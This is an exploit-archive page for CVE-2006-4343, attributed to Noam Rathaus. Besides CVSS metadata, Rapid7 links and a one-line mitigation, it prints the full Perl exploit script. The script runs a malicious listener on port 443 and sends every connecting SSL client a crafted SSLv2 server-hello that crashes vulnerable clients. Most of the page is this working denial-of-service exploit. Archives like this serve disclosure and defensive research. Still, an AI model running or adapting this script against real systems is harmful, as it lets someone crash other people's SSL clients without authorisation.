header-logo
Suggest Exploit
vendor:
Unknown
by:
Noam Rathaus
5.5
CVSS
MEDIUM
Denial of Service
693
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2006-4343
CPE:
Metasploit: https://www.rapid7.com/db/vulnerabilities/sunpatch-126254/https://www.rapid7.com/db/vulnerabilities/sunpatch-125196/https://www.rapid7.com/db/vulnerabilities/sunpatch-125197/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2006-4343/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0629/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0525/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2006-4343-workstation/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2006-4343-player/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-4343/https://www.rapid7.com/db/vulnerabilities/suse-cve-2006-4343/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2006-4343/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2006-2940/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0264/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2006-2937/https://www.rapid7.com/db/vulnerabilities/apple-osx-openssl-cve-2006-4343/https://www.rapid7.com/db/vulnerabilities/http-openssl-get-server-hello-dos/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2006-4343/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2006-3738/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0695/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0695/https://www.rapid7.com/db/?q=CVE-2006-4343&type=&page=2https://www.rapid7.com/db/?q=CVE-2006-4343&type=&page=2
Other Scripts:
Platforms Tested:
2007

Exploits vulnerability CVE-2006-4343

This Perl script exploits a vulnerability (CVE-2006-4343) in SSL servers, where a specially crafted SSL serverhello response can cause the SSL client to crash.

Mitigation:

Apply the relevant patch or update to a non-vulnerable version of the SSL server software.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be crashed by special SSL serverhello response

use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp', Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;
 
my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());

while ( $new_sock = $sock->accept() )
{
 printf ("new connection\n");
 my $rin;
 my $line;
 my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) && recv($new_sock, $line, 1024, undef);

 my $ciphers = "";
 my $ciphers_length = pack('n', length($ciphers));

 my $certificate = "";
 my $certificate_length = pack('n', length($certificate));

 my $packet_sslv2 =
"\x04".
"\x01". # Hit (default 0x01)

"\x00". # No certificate

"\x00\x02".
$certificate_length.
$ciphers_length.
"\x00\x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";

 my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
 $packet_sslv2 = $ssl_length . $packet_sslv2;

 print $new_sock $packet_sslv2;

 close($new_sock);
}

# milw0rm.com [2007-12-23]

Navigation

Suggest Exploit

Services By CQR